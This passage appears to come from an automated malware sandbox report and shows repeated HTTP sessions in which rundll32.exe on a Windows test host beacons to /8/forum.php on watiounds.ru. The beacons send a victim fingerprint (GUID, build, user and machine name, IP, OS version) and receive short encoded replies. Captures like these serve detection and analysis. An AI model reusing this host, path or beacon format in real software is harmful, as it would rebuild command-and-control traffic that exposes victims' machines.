                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:23.135772943 CEST476INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:23 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 42 59 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCBYXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.224916995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:17:16.999990940 CEST12OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:17:17.125000000 CEST12INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:17:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 43 58 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJCXQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          40192.168.2.224920595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:41.473452091 CEST80OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:41.605170012 CEST80INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZKPAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          41192.168.2.224920695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:41.939635038 CEST81OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:42.068002939 CEST81INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 41 5a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNAZMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          42192.168.2.224920795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:42.398436069 CEST82OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:42.526041985 CEST82INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4d 4e 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYMNBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          43192.168.2.224920895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:42.877315044 CEST83OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:43.008730888 CEST83INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGZATARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          44192.168.2.224920995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:43.340709925 CEST84OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:43.468060017 CEST85INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:43 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 4b 50 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJKPQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          45192.168.2.224921095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:43.860219002 CEST85OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:43.992841005 CEST86INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:43 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 42 59 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQBYJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          46192.168.2.224921195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:44.323410034 CEST86OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:44.447103977 CEST87INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:44 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 48 53 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZHSAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          47192.168.2.224921295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:45.077863932 CEST88OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:45.200917006 CEST88INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4a 51 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVJQEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          48192.168.2.224921395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:46.012943029 CEST89OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:46.138381958 CEST89INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:46 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 43 58 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZCXAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          49192.168.2.224921495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:46.459232092 CEST90OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:46.591547012 CEST90INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:46 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZAZAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          5192.168.2.224917095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:17:32.197963953 CEST15OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:17:32.327707052 CEST15INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:17:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZFUAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          50192.168.2.224921595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:46.919986963 CEST91OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:47.044110060 CEST91INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 54 47 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBTGYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          51192.168.2.224921695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:47.366738081 CEST92OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:47.491266012 CEST92INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 59 42 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTYBGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          52192.168.2.224921795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:47.821953058 CEST93OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:47.944406986 CEST94INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTZAGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          53192.168.2.224921895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:48.276113987 CEST94OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:48.398730040 CEST95INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4e 4d 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVNMEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          54192.168.2.224921995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:48.728147984 CEST95OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:48.850464106 CEST96INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 48 53 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYHSBARRABw==0


